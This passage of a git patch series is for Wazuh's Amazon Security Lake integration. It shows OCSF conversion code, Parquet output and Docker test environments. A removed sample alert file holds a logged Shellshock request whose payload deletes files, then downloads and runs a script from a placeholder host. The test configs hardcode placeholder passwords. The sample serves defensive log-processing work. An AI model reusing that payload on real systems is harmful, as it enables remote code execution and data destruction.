"uid": event['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." - }, - "version": "1.1.0", - }, - "raw_data": event["full_log"], - "resources": [ - { - "name": event["agent"]["name"], - "uid": event["agent"]["id"] - }, - ], - "risk_score": event["rule"]["level"], - "severity_id": normalize(event["rule"]["level"]), - "status_id": 99, - "time": event["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["location"], - event["manager"]["name"] - ], - "nist": event["rule"]["nist_800_53"], # Array - } - } + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, + ], + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + #event["_source"]["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + #"nist": event["_source"]["rule"]["nist_800_53"], # Array + } + } - return ocsf_class_template + return ocsf_class_template diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 49926a8aa1d64..4fdecc14c073e 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python3 +#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3 import os import sys @@ -7,44 +7,18 @@ import time import json import datetime -from pyarrow import parquet, Table, fs - +from pyarrow import parquet, Table from ocsf import converter block_ending = { "block_ending": True } -s3 = fs.S3FileSystem() - -#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): -# ocsf_output = {} -# ### Put constants into the output alert -# ocsf_output |= mappings[ocsfschema]['constants'] -# -# for key in mappings[ocsfschema]['mappings']: -# dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) -# depth_levels = dotted_destination.split('.') -# current_level = alert_dictionary[depth_levels[0]] -# if len(depth_levels>1): -# for field in depth_levels[1:]: -# current_level = current_level[field] -# ocsf_output[key] = current_level -# ### We probably need to crop the fields we already -# ### mapped to OCSF from ocsf_output -# ocsf_output['unmapped'] = alert_dictionary - -def encode_parquet(list,bucket_name,folder): - ### We can write directly to S3 from pyarrow: - ### https://arrow.apache.org/docs/python/filesystems.html#s3 - ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream - ### - ### Credentials can be stored in ~/.aws/credentials - ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html - +def encode_parquet(list,foldername,filename): table = Table.from_pylist(list) - parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) + parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) def map_block(fileobject, length): output=[] + ocsf_mapped_alert = {} for line in range(0, length): line = fileobject.readline() if line == '': @@ -52,36 +26,28 @@ def map_block(fileobject, length): break alert = json.loads(line) ocsf_mapped_alert = converter.convert(alert) - #map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): current_time = datetime.datetime.now(datetime.timezone.utc) return (current_time - reference_timestamp).total_seconds() - if __name__ == "__main__": - clock = datetime.datetime.now(datetime.timezone.utc) - clockstr = clock.strftime('%F_%H.%M.%S') + date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') - parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') - parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') - parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') - parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') - parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') - parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate debugging') + parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') + parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') + parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') + parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() - logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: - #with open(ocsf_mapping_filename) as jsonfile: - # mappings = json.loads(jsonfile.read()) with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] @@ -89,22 +55,20 @@ def get_elapsedseconds(reference_timestamp): try: while True: - ### We can possibly replace all the custom code here - ### and just use Arrow's built-in input and output facilities: - ### * https://arrow.apache.org/docs/python/memory.html#input-and-output - ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas - ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - - current_block = map_block(stdin, args.linebuffer ) - if current_block[-1] == block_ending : - output_buffer += current_block[0:current_block.index(block_ending)] - time.sleep(args.sleeptime) + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer,args.bucketname,args.foldername) + encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] - output_buffer.append(current_block) + + current_block = map_block( stdin, args.linebuffer ) + + if current_block[-1] == block_ending: + output_buffer += current_block[0:-1] + time.sleep(args.sleeptime) + else: + output_buffer += current_block except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") @@ -116,4 +80,3 @@ def get_elapsedseconds(reference_timestamp): logging.error("Error running script") logging.error(e) raise - exit(1) From e06203c32c3bbac39639abe4ff8819ed90663e7e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 15:38:53 -0300 Subject: [PATCH 20/34] Remove unnecessary type declaration from debug flag --- integrations/amazon-security-lake/stdin_to_securitylake.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 4fdecc14c073e..b8fa6c17bbf4c 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -36,7 +36,7 @@ def get_elapsedseconds(reference_timestamp): if __name__ == "__main__": date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate debugging') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') From 6826e127a60ef34551349dff86a0a6cc11816637 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 17:00:15 -0300 Subject: [PATCH 21/34] Improved parquet encoding --- .../stdin_to_securitylake.py | 29 ++++++++++++------- 1 file changed, 19 insertions(+), 10 deletions(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index b8fa6c17bbf4c..ec90025d9afa3 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3 +#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3 import os import sys @@ -13,8 +13,13 @@ block_ending = { "block_ending": True } def encode_parquet(list,foldername,filename): - table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + try: + table = Table.from_pylist(list) + print(table) + parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + except Exception as e: + logging.error(e) + raise def map_block(fileobject, length): output=[] @@ -44,7 +49,8 @@ def get_elapsedseconds(reference_timestamp): parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() - logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) + #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: @@ -55,12 +61,6 @@ def get_elapsedseconds(reference_timestamp): try: while True: - - if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) - logging.debug(json.dumps(output_buffer)) - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - output_buffer = [] current_block = map_block( stdin, args.linebuffer ) @@ -70,6 +70,15 @@ def get_elapsedseconds(reference_timestamp): else: output_buffer += current_block + if len(output_buffer) == 0: + continue + + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: + logging.info('Writing data to parquet file') + encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) + starttimestamp = datetime.datetime.now(datetime.timezone.utc) + output_buffer = [] + except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") exit(0) From 9cfc24786cd96d6c4f239e3d4e64db0475299c12 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 19 Feb 2024 15:38:04 -0300 Subject: [PATCH 22/34] Initial commit for test env's docker-compose.yml --- .../stdin_to_securitylake.py | 1 - integrations/docker/docker-compose.yml | 117 ++++++++++++++++++ 2 files changed, 117 insertions(+), 1 deletion(-) create mode 100644 integrations/docker/docker-compose.yml diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index ec90025d9afa3..eee82036c3ff5 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -15,7 +15,6 @@ def encode_parquet(list,foldername,filename): try: table = Table.from_pylist(list) - print(table) parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) except Exception as e: logging.error(e) diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml new file mode 100644 index 0000000000000..ebd6b348c5116 --- /dev/null +++ b/integrations/docker/docker-compose.yml @@ -0,0 +1,117 @@ +version: "3.8" + +services: + + events-generator: + image: events-generator + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt update && apt install -y python3-requests + container_name: events-generator + volumes: + - ../tools/events-generator:/home/events-generator + hostname: events-generator + working_dir: "/home/events-generator" + entrypoint: sh -c "python3 run.py" + networks: + wazuh-indexer-dev: + aliases: + - events-generator + ipv4_address: 172.18.0.2 + depends_on: + - wazuh-indexer + + wazuh-indexer: + image: wazuh/wazuh-indexer:4.8.0-beta1 + container_name: wazuh-indexer + hostname: wazuh-indexer + restart: always + networks: + wazuh-indexer-dev: + aliases: + - wazuh-indexer + ipv4_address: 172.18.0.3 + ports: + - "9222:9200" + depends_on: + - generator + environment: + - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g" + - "bootstrap.memory_lock=true" + - 'INDEXER_PASSWORD=SecretPassword' + ulimits: + memlock: + soft: -1 + hard: -1 + nofile: + soft: 65536 + hard: 65536 + volumes: + - ./wazuh-indexer-data:/var/lib/wazuh-indexer + - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem + - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.key + - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.pem + - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem + - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem + - ./config/wazuh_indexer/wazuh1.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml + - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml + + generator: + image: wazuh/wazuh-certs-generator:0.0.1 + hostname: wazuh-certs-generator + volumes: + - ./config/wazuh_indexer_ssl_certs/:/certificates/ + - ./config/certs.yml:/config/certs.yml + environment: + - HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS + + logstash: + image: logstash + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https + WORKDIR /home/logstash + RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + apt update && \ + apt install -y logstash && \ + chown -R logstash:logstash /etc/logstash && \ + chown logstash:logstash /home/logstash + entrypoint: /usr/share/bin/logstash --path.settings /etc/logstash --config.reload.automatic + container_name: logstash + hostname: logstash + user: logstash + volumes: + - ../amazon-security-lake:/home/logstash + - ../amazon-security-lake/logstash/pipe-output.conf:/etc/logstash/conf.d/pipe-output.conf + - ../amazon-security-lake/logstash/pipelines.yml:/etc/logstash/pipelines.yml + networks: + wazuh-indexer-dev: + aliases: + - logstash + ipv4_address: 172.18.0.4 + depends_on: + - wazuh-indexer + - s3-ninja + + s3-ninja: + image: scireum/s3-ninja + container_name: s3-ninja + hostname: s3-ninja + volumes: + - ./s3-ninja_data:/home/sirius/data + networks: + wazuh-indexer-dev: + aliases: + - s3-ninja + ipv4_address: 172.18.0.5 + ports: + - "9444:9000" + +networks: + wazuh-indexer-dev: + ipam: + config: + - subnet: "172.18.0.0/16" From 324d1f5033871722a60c4b1b54ac16b9bee5eb6e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 19 Feb 2024 16:52:36 -0300 Subject: [PATCH 23/34] Remove sudo references from docker-compose.yml --- integrations/docker/docker-compose.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml index ebd6b348c5116..dd7f12f119e05 100644 --- a/integrations/docker/docker-compose.yml +++ b/integrations/docker/docker-compose.yml @@ -73,8 +73,8 @@ services: FROM ubuntu:20.04 RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https WORKDIR /home/logstash - RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ - echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ apt update && \ apt install -y logstash && \ chown -R logstash:logstash /etc/logstash && \ From cb5ac7321bea365f46965b8bb5fa1359991422ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Wed, 21 Feb 2024 16:34:34 +0100 Subject: [PATCH 24/34] Add operational Python module to transform events to OCSF --- .../amazon-security-lake/docker-compose.yml | 67 +++++++++++ .../logstash/{ => pipeline}/pipe-output.conf | 11 +- .../logstash/{ => pipeline}/wazuh-s3.conf | 0 .../amazon-security-lake/logstash/setup.sh | 15 +++ .../amazon-security-lake/ocsf/__init__.py | 2 - .../amazon-security-lake/ocsf/converter.py | 89 -------------- .../ocsf/wazuh-event.sample.json | 90 -------------- .../amazon-security-lake/requirements.txt | 3 +- integrations/amazon-security-lake/run.py | 34 ++++++ .../stdin_to_securitylake.py | 5 +- .../transform/__init__.py | 1 + .../transform/converter.py | 112 ++++++++++++++++++ .../transform/legacy/legacy_converter.py | 87 ++++++++++++++ .../legacy/legacy_test.py} | 10 +- .../transform/models/__init__.py | 2 + .../transform/models/ocsf.py | 66 +++++++++++ .../transform/models/wazuh.py | 50 ++++++++ .../wazuh-event.sample.json | 76 ++++++++++++ 18 files changed, 525 insertions(+), 195 deletions(-) create mode 100644 integrations/amazon-security-lake/docker-compose.yml rename integrations/amazon-security-lake/logstash/{ => pipeline}/pipe-output.conf (69%) rename integrations/amazon-security-lake/logstash/{ => pipeline}/wazuh-s3.conf (100%) create mode 100644 integrations/amazon-security-lake/logstash/setup.sh delete mode 100644 integrations/amazon-security-lake/ocsf/__init__.py delete mode 100644 integrations/amazon-security-lake/ocsf/converter.py delete mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json create mode 100644 integrations/amazon-security-lake/run.py create mode 100644 integrations/amazon-security-lake/transform/__init__.py create mode 100644 integrations/amazon-security-lake/transform/converter.py create mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_converter.py rename integrations/amazon-security-lake/{ocsf/test.py => transform/legacy/legacy_test.py} (57%) create mode 100644 integrations/amazon-security-lake/transform/models/__init__.py create mode 100644 integrations/amazon-security-lake/transform/models/ocsf.py create mode 100644 integrations/amazon-security-lake/transform/models/wazuh.py create mode 100644 integrations/amazon-security-lake/wazuh-event.sample.json diff --git a/integrations/amazon-security-lake/docker-compose.yml b/integrations/amazon-security-lake/docker-compose.yml new file mode 100644 index 0000000000000..6c5c1c21445c9 --- /dev/null +++ b/integrations/amazon-security-lake/docker-compose.yml @@ -0,0 +1,67 @@ +version: '3' +services: + opensearch-node: + image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues + container_name: opensearch-node + environment: + - cluster.name=opensearch-cluster + - node.name=opensearch-node + - discovery.seed_hosts=opensearch-node + - cluster.initial_cluster_manager_nodes=opensearch-node + - bootstrap.memory_lock=true + - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" + ulimits: + memlock: + soft: -1 + hard: -1 + nofile: + soft: 65536 + hard: 65536 + volumes: + - opensearch-data:/usr/share/opensearch/data + networks: + - opensearch-net + opensearch-dashboards: + image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes + container_name: opensearch-dashboards + ports: + - 5601:5601 # Map host port 5601 to container port 5601 + expose: + - "5601" # Expose port 5601 for web access to OpenSearch Dashboards + environment: + OPENSEARCH_HOSTS: '["https://opensearch-node:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query + networks: + - opensearch-net + logstash: + build: + context: . + dockerfile_inline: | + FROM logstash:8.12.1 + + COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh + COPY --chown=logstash:logstash logstash/pipeline/pipe-output.conf /usr/share/logstash/pipeline/pipe-output.config + + RUN bash /usr/share/logstash/bin/setup.sh + RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch + container_name: logstash + environment: + LOG_LEVEL: trace + LOGSTASH_KEYSTORE_PASS: "SecretPassword" + MONITORING_ENABLED: false + ports: + - "5000:5000/tcp" + - "5000:5000/udp" + - "5044:5044" + - "9600:9600" + depends_on: + - opensearch-node + networks: + - opensearch-net + command: tail -f /dev/null + # command: logstash -f /usr/share/logstash/pipeline/pipe-output.config + +volumes: + opensearch-data: + +networks: + opensearch-net: \ No newline at end of file diff --git a/integrations/amazon-security-lake/logstash/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf similarity index 69% rename from integrations/amazon-security-lake/logstash/pipe-output.conf rename to integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf index 4f64eb5a46a54..0cc7a7d089ec3 100644 --- a/integrations/amazon-security-lake/logstash/pipe-output.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf @@ -1,11 +1,10 @@ input { opensearch { - hosts => ["127.0.0.1:9200"] - user => "${WAZUH_INDEXER_USERNAME}" - password => "${WAZUH_INDEXER_PASSWORD}" + hosts => ["opensearch-node:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" + ssl => false index => "wazuh-alerts-4.x-*" - ssl => true - ca_file => "/etc/logstash/wi-certs/root-ca.pem" query => '{ "query": { "range": { @@ -15,7 +14,7 @@ input { } } }' - target => "_source" + target => "_source" schedule => "* * * * *" } } diff --git a/integrations/amazon-security-lake/logstash/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf similarity index 100% rename from integrations/amazon-security-lake/logstash/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf diff --git a/integrations/amazon-security-lake/logstash/setup.sh b/integrations/amazon-security-lake/logstash/setup.sh new file mode 100644 index 0000000000000..2b1fc109f401a --- /dev/null +++ b/integrations/amazon-security-lake/logstash/setup.sh @@ -0,0 +1,15 @@ +#!/usr/bin/bash + +# This script creates and configures a keystore for Logstash to store +# indexer's credentials. NOTE: works only for dockerized logstash. +# Source: https://www.elastic.co/guide/en/logstash/current/keystore.html + +# Prepare keystore +set +o history +export LOGSTASH_KEYSTORE_PASS="SecretPassword" +set -o history + +# Create keystore +/usr/share/logstash/bin/logstash-keystore create +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py deleted file mode 100644 index 777a7d20549b5..0000000000000 --- a/integrations/amazon-security-lake/ocsf/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -# Python module placeholder -# TODO export submodules \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py deleted file mode 100644 index c927afa8fe87f..0000000000000 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ /dev/null @@ -1,89 +0,0 @@ -#!/usr/bin/python3 - -# event comes from Filebeat -#event = {} -#print(event) - -def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level - - -def join(iterable, separator=","): - return (separator.join(iterable)) - - -def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["_source"]["rule"]["groups"]), - "name": event["_source"]["decoder"]["name"], - "type_id": 1, - "uid": event["_source"]["rule"]["id"], - }, - "attacks": { - "tactic": { - #"name": join(event["_source"]["rule"]["mitre"]["tactic"]), - "dummy": True - }, - "technique": { - #"name": join(event["_source"]["rule"]["mitre"]["technique"]), - #"uid": join(event["_source"]["rule"]["mitre"]["id"]), - "dummy": True - }, - "version": "v13.1" - }, - "title": event["_source"]["rule"]["description"], - "types": [ - event["_source"]["input"]["type"] - ], - "uid": event["_source"]['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." - }, - "version": "1.1.0", - }, - #"raw_data": event["_source"]["full_log"], - "resources": [ - { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] - }, - ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), - "status_id": 99, - "time": event["_source"]["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - #event["_source"]["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] - ], - #"nist": event["_source"]["rule"]["nist_800_53"], # Array - } - } - - return ocsf_class_template diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json deleted file mode 100644 index 3f35697a9fe36..0000000000000 --- a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json +++ /dev/null @@ -1,90 +0,0 @@ -{ - "_index": "wazuh-alerts-4.x-2024.02.08", - "_id": "yBMliY0Bt8FzffO0BOIu", - "_version": 1, - "_score": null, - "_source": { - "input": { - "type": "log" - }, - "agent": { - "name": "redacted.com", - "id": "000" - }, - "manager": { - "name": "redacted.com" - }, - "data": { - "protocol": "GET", - "srcip": "000.111.222.10", - "id": "404", - "url": "/cgi-bin/jarrewrite.sh" - }, - "rule": { - "firedtimes": 1, - "mail": false, - "level": 6, - "pci_dss": [ - "11.4" - ], - "tsc": [ - "CC6.1", - "CC6.8", - "CC7.2", - "CC7.3" - ], - "description": "Shellshock attack attempt", - "groups": [ - "web", - "accesslog", - "attack" - ], - "mitre": { - "technique": [ - "Exploitation for Privilege Escalation", - "Exploit Public-Facing Application" - ], - "id": [ - "T1068", - "T1190" - ], - "tactic": [ - "Privilege Escalation", - "Initial Access" - ] - }, - "id": "31166", - "nist_800_53": [ - "SI.4" - ], - "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", - "gdpr": [ - "IV_35.7.d" - ] - }, - "location": "/var/log/nginx/access.log", - "decoder": { - "name": "web-accesslog" - }, - "id": "1707402914.872885", - "GeoLocation": { - "city_name": "Amsterdam", - "country_name": "Netherlands", - "region_name": "North Holland", - "location": { - "lon": 4.9087, - "lat": 52.3534 - } - }, - "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", - "timestamp": "2024-02-08T11:35:14.334-0300" - }, - "fields": { - "timestamp": [ - "2024-02-08T14:35:14.334Z" - ] - }, - "sort": [ - 1707402914334 - ] -} \ No newline at end of file diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt index 8c7a1cbaae79b..8ebe50a4ef264 100644 --- a/integrations/amazon-security-lake/requirements.txt +++ b/integrations/amazon-security-lake/requirements.txt @@ -1,2 +1,3 @@ pyarrow>=10.0.1 -parquet-tools>=0.2.15 \ No newline at end of file +parquet-tools>=0.2.15 +pydantic==2.6.1 \ No newline at end of file diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py new file mode 100644 index 0000000000000..d8234226bf98e --- /dev/null +++ b/integrations/amazon-security-lake/run.py @@ -0,0 +1,34 @@ +import transform +import json + + +def _test(): + ocsf_event = {} + with open("./wazuh-event.sample.json", "r") as fd: + # Load from file descriptor + raw_event = json.load(fd) + try: + event = transform.converter.from_json(raw_event) + print(event) + ocsf_event = transform.converter.to_detection_finding(event) + print("") + print("--") + print("") + print(ocsf_event) + # event = Event.model_validate_json(json.dumps(event)) + # print(event) + # ocsf_event = to_detection_finding(event) + + except KeyError as e: + raise (e) + # except ValidationError as e: + # print(e) + + # if ocsf_event: + # with open("wazuh-event.ocsf.json", "w") as fd: + # json.dump(ocsf_event.model_dump(), fd) + # print(ocsf_event.model_dump()) + + +if __name__ == '__main__': + _test() diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index eee82036c3ff5..ab399f58b7b9a 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -7,8 +7,9 @@ import time import json import datetime -from pyarrow import parquet, Table -from ocsf import converter +from pyarrow import parquet, Table, fs + +from transform import converter block_ending = { "block_ending": True } diff --git a/integrations/amazon-security-lake/transform/__init__.py b/integrations/amazon-security-lake/transform/__init__.py new file mode 100644 index 0000000000000..6e8733a32b85d --- /dev/null +++ b/integrations/amazon-security-lake/transform/__init__.py @@ -0,0 +1 @@ +import transform.converter diff --git a/integrations/amazon-security-lake/transform/converter.py b/integrations/amazon-security-lake/transform/converter.py new file mode 100644 index 